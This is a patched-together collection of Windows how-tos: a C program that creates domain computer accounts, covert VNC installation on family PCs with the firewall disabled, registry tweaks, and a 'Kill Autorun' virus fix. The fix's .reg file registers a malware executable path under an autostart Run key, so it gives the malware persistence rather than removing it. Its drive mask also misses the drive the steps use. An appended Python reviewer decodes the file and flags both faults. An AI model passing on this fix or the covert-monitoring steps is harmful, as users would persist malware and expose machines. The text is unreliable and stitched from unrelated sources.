        return FALSE;
    }
    else
        printf("Computer account type is valid.\n");

    // Obtain the number of chars in computer account name.
    cbLength = cbAccount = lstrlenW(MachineAccount);

    // Ensure computer name doesn't exceed maximum length.
    if(cbLength > MAX_COMPUTERNAME_LENGTH)
    {
        SetLastError(ERROR_INVALID_ACCOUNT_NAME);
        return FALSE;
    }
    else
        printf("Computer name length is valid.\n");

    // Allocate storage to contain Unicode representation of
    // computer account name + trailing $ + NULL.
    wAccount = (LPWSTR)HeapAlloc(GetProcessHeap(), 0,
                   (cbAccount + 1 + 1) * sizeof(WCHAR)  // Account + '$' + NULL
                   );
    if(wAccount == NULL)
        return FALSE;
    else
        printf("Memory allocation is OK.\n");

    // Password is the computer account name converted to lowercase;
    // you will convert the passed MachineAccount in place.
    wPassword = MachineAccount;

    // Copy MachineAccount to the wAccount buffer allocated while
    // converting computer account name to uppercase.
    // Convert password (in place) to lowercase.
    while(cbAccount--)
    {
        wAccount[cbAccount] = towupper(MachineAccount[cbAccount]);
        wPassword[cbAccount] = towlower(wPassword[cbAccount]);
    }

    // Computer account names have a trailing Unicode '$'.
    wAccount[cbLength] = L'$';
    wAccount[cbLength + 1] = L'\0'; // terminate the string

    // If the password is greater than the max allowed, truncate.
    if(cbLength > LM20_PWLEN)
        wPassword[LM20_PWLEN] = L'\0';
    else
        printf("No truncation was done to the password, the length is OK, max is 14.\n");

    // Initialize the USER_INFO_1 structure.
    ZeroMemory(&ui, sizeof(ui));
    ui.usri1_name = wAccount;
    ui.usri1_password = wPassword;
    ui.usri1_flags = AccountType | UF_SCRIPT;
    ui.usri1_priv = USER_PRIV_USER;
    ui.usri1_comment = L"A virtual machine created by NetUserAdd()...";

    dwError = NetUserAdd(wTargetComputer,  // target computer name
                         1,                // info level
                         (LPBYTE) &ui,     // buffer
                         NULL);

    // Release the allocated memory.
    if(wAccount)
        HeapFree(GetProcessHeap(), 0, wAccount);

    // Indicate whether the function was successful.
    if(dwError == NO_ERROR)
    {
        printf("%ls computer account successfully created on %ls DC.\n", MachineAccount, wTargetComputer);
        return TRUE;
    }
    else
    {
        SetLastError(dwError);
        return FALSE;
    }
}

// This program, run at the command prompt, receives 2 arguments:
// the target server and the machine account name.
int wmain(int argc, wchar_t *argv[])
{
    if(argc != 3)
    {
        // argv[] holds wide strings, so print the program name with %ls.
        printf("Usage: %ls <TargetComputer> <MachineAccount/Password>.\n", argv[0]);
        exit (-1);
    }

    DWORD AccountType = UF_WORKSTATION_TRUST_ACCOUNT;
    BOOL Test = AddMachineAccount(argv[1], argv[2], AccountType);
    printf("The return value is: %u\n", Test);
    return 0;
}

A sample output:

C:\myproject\win32prog\Debug>machineacct
Usage: machineacct <TargetComputer> <MachineAccount/Password>.

C:\myproject\win32prog\Debug>machineacct Mawar mymachine
Computer account type is valid.
Computer name length is valid.
Memory allocation is OK.
No truncation was done to the password, the length is OK, max is 14.
mymachine computer account successfully created on Mawar DC.
The return value is: 1

Verify our task.

Figure 10: MYMACHINE computer account has been created.

The user that calls the account management functions must have Administrator privilege on the target computer. In the case of existing computer accounts, the creator of the account can manage the account, regardless of administrative membership. The SeMachineAccountPrivilege can be granted on the target computer to give specified users the ability to create computer accounts. This gives nonadministrators the ability to create computer accounts. The caller needs to enable this privilege prior to adding the computer account.

------------------------User Accounts and Groups: Story and Program Examples, Part II-----------------------

Registry Key to Clear the History of Remote Desktop Connections

Registry: Start > Run > Regedit > OK
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default
Then find the entry that you want to remove and delete it. If you connect to the same PC all the time then you can also add this in as the default option to avoid having to use the dropdown each time.

VNC Remote access software

Download the "Windows Self Installing Package". After you have downloaded it you will need to go to the offender's PCs and install the software, which is easy and simple. You will need to install the "Server" client for the kids' PC and for your PC install the "Viewer".

After you have installed the software on the kids' PCs you will need to click on the VNC icon at the bottom corner of the screen. It will now ask you to put a password in the box and also confirm it in another box. Apply those settings, then you're good to go. Oh, and don't forget to take off the Windows Firewall or make an exception within the program for VNC.

When you go onto your PC click on "VNC Viewer". This will open up the viewer software. It will now ask you to put the IP address or computer name in the box to connect to it. You need to know what IP address the kids are on. There are many ways of doing this. Here are some examples:

1.) Press Start, type "cmd" in the "search programs and files" box and press Enter. A black box will appear. Type in "IPCONFIG /ALL" (don't forget there is a space in that command). It will now show you lots of static content..... You need the "IPv4 Address". It will probs be something like this: 192.168.1.3
2.) Another way is by going onto your router and finding where it says "DHCP Leases". This will show who is connected or who has a lease on your router.
***This way is probs the best as their IP address can change from time to time unless you change the lease time***

Manually in Registry Editor to hide tray icon in the customize notification (it is in the right side bottom)

NOTE: This will only turn on or off "Always show icons and notifications on the taskbar".

1. Open the Start Menu.
2. In the search box, type regedit and press Enter.

3. In regedit, navigate to the location below.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
4. In the right pane, right click on EnableAutoTray and click on Modify.

5. To Turn On "Always show all taskbar icons and notifications"
A) Type in 0 (zero) and click on OK.

B) Go to step 7.
6. To Turn Off "Always show all taskbar icons and notifications"
A) Type in 1 and click on OK.
7. Close Regedit.
8. Log off and log on, or restart the computer to apply the changes.

How to block (lock) Internet Explorer

Open your registry and find the key below.
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
Change the value of "ProxyEnable" and set it to "1". Change the value of "ProxyServer" and set it to an IP address and port that is invalid on your network such as "10.0.0.1:5555" (i.e. "IP:Port"). By changing these settings Internet access will be disabled for any applications that rely on the Microsoft proxy server information such as Internet Explorer, Microsoft Office, Opera browser.

To stop users from modifying the proxy settings add these restrictions to disable changes to the Internet configuration. Find or create the key below:
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
Create two DWORD values named "Connection Settings" and "Connwiz Admin Lock" and set them both to "1". To remove the restriction, set the proxy settings back to their original values and delete the policy values.

Note: The change will take effect immediately for any new browser windows; existing Internet Explorer sessions will not be affected until the browser is closed and reopened.

How to Remove Programs with Delete Command Prompt

Author: Tomaz | Posted at: 4/18/2009 | Filed Under: tutorial

One of the tasks you can do using command prompt is to completely uninstall every program in your computer. Of course it is far easier to use standard add/remove or special third party uninstallers, but in some rare cases there is no other way to uninstall a program than through command prompt. For example when you have to boot into corrupted Windows with so-called boot with command prompt. Here we are going to take a look at how to uninstall CCleaner using the delete command prompt function.

Open Start > Run > cmd. Enter "cd %programfiles%" and press Enter. Type "dir /p" without quotes. You will see the list of all your programs now. To delete (uninstall) CCleaner type rd /s "CCleaner" and press "Y". This will permanently delete this program so be sure you know this is what you want.

You can delete any program using this method; just replace the name with what you want to delete.

Files on External/Flash Drive Changed to Shortcuts Virus
Issue

I caught a virus on my flash drive at work and it appears to have changed all my file names to shortcuts. I believe I've cleaned the virus but how do I get my files back so that I can view them?

Solution

* If you did not format your flash drive, then check whether the files are not in hidden mode.
* Click on Start > Run > type cmd and click on OK.
* Check your external Drive letter in My Computer
* Here I assume your external drive as G:
* Enter this command.
* attrib -h -r -s /s /d g:*.*
* Delete the unnecessary shortcuts.

Note: Replace the letter g with your flash drive letter.

Kill Autorun
Step 1: Create a .bat file like "KillAutorun.bat" and paste the code below into the bat file.

rem Remove the existing autorun.inf and put a read-only, hidden folder of the same name in its place
attrib -r autorun.inf
del autorun.inf
md autorun.inf
attrib +r +h autorun.inf
rem Import the registry file created in Step 2
Dissable_auto_run.reg

Step 2: Create the .reg file "Dissable_auto_run.reg" to stop Windows Auto run.

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveAutoRun"=dword:000000ff

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"Policies"=hex(2):43,3a,5c,57,49,4e,44,4f,57,53,5c,73,79,73,74,65,6d,33,32,5c,\
77,69,6e,64,6f,77,73,33,32,5f,72,61,69,6e,73,74,65,72,5c,6d,79,73,6c,69,64,\
65,73,2e,65,78,65,00

Step 3: Place both files (Dissable_auto_run.reg and KillAutorun.bat) in the USB root. Execute (double-click) KillAutorun.bat

Step 4: Assume the USB drive id is "I:"
Open I:\RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\
This folder will have some exe file. Eg: myslides.exe
Create one batch file the same as in Step 1. Eg: create a .bat file like "KillAutorun.bat" and paste the code below into the bat file.

attrib -r myslides.exe
del myslides.exe
md myslides.exe
attrib +r +h myslides.exe

Run this bat file from "I:\RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\"

Note: S-1-5-21-1482476501-3352491937-682996330-1013 this folder name will differ from one system to another system.

Thanks and Regards Rajesh Natarajan MCDBA India
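Before importing a .reg file like Dissable_auto_run.reg it is worth decoding what its values actually contain. The Python below is an added example, not part of the original post: it parses the two values as posted in Step 2, expands the NoDriveAutoRun bitmask using the drive-letter values this page lists (A:1, B:2, C:4 ... Z:33554432), and decodes the hex(2) data; the function names parse_reg, drives_from_mask and review are this example's own.

```python
import re

# .reg text as posted in Step 2 (values copied from the page).
REG_TEXT = r'''REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveAutoRun"=dword:000000ff

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"Policies"=hex(2):43,3a,5c,57,49,4e,44,4f,57,53,5c,73,79,73,74,65,6d,33,32,5c,\
77,69,6e,64,6f,77,73,33,32,5f,72,61,69,6e,73,74,65,72,5c,6d,79,73,6c,69,64,\
65,73,2e,65,78,65,00
'''

# Key suffixes whose values Windows launches at logon.
AUTOSTART = (r"\currentversion\run", r"\currentversion\runonce",
             r"\policies\explorer\run")

def parse_reg(text):
    """Return {key: {value_name: data}} for dword and hex(2) values."""
    text = re.sub(r"\\\r?\n\s*", "", text)      # join "\"-continued lines
    out, key = {}, None
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            out[key] = {}
            continue
        m = re.match(r'"([^"]+)"=(dword|hex\(2\)):(.*)$', line)
        if not (m and key):
            continue
        name, kind, data = m.groups()
        if kind == "dword":
            out[key][name] = int(data, 16)
        else:
            # REGEDIT4 files hold REG_EXPAND_SZ as NUL-terminated ANSI bytes.
            raw = bytes(int(b, 16) for b in data.split(",") if b.strip())
            out[key][name] = raw.rstrip(b"\0").decode("cp1252")
    return out

def drives_from_mask(mask):
    """Bit 0 is A:, bit 1 is B:, ... bit 25 is Z:."""
    return [chr(ord("A") + i) for i in range(26) if mask & (1 << i)]

def review(text):
    """List what importing the file would set, as (finding, detail) pairs."""
    findings = []
    for key, values in parse_reg(text).items():
        for name, data in values.items():
            if name == "NoDriveAutoRun":
                findings.append(("autorun-disabled", "".join(drives_from_mask(data))))
            elif key.lower().endswith(AUTOSTART):
                findings.append(("autostart-entry", data))
    return findings

if __name__ == "__main__":
    print(review(REG_TEXT))
```

On the posted values this reports autorun disabled for drives A to H only, so the I: drive assumed in Step 4 is not covered by the mask. It also shows that the hex(2) data is the path C:\WINDOWS\system32\windows32_rainster\myslides.exe, which importing the file writes under the Policies\Explorer\Run autostart key; a .reg line only deletes a value when it is written as "Policies"=-.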

33. A:1, B:2, C:4, D:8, E:16, F:32, G:64, H:128, I:256, J:512, K:1024, Z:33554432
